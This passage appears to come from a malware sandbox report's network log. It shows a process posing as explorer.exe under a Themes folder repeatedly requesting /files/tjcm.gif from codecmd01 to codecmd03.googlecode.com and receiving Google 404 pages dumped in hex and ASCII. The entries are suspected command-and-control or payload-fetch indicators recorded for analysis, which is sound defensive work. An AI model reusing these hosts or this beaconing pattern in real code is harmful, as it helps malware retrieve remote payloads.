                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:26.302108049 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          44192.168.2.45671564.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:27.090284109 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:27.836442947 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:27 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:27.836496115 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          45192.168.2.45672566.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:28.317826986 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:29.043484926 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:28 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:29.043515921 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          46192.168.2.45673174.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:29.728908062 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:30.465274096 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:30 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:30.465377092 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          47192.168.2.45674264.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:30.860106945 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:31.583496094 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:31 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:31.583539963 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          48192.168.2.45674866.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:31.996359110 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:32.715470076 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:32 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:32.715492964 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          49192.168.2.45675574.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:33.120348930 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:34.557426929 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:34.557492018 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:18:34.557506084 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
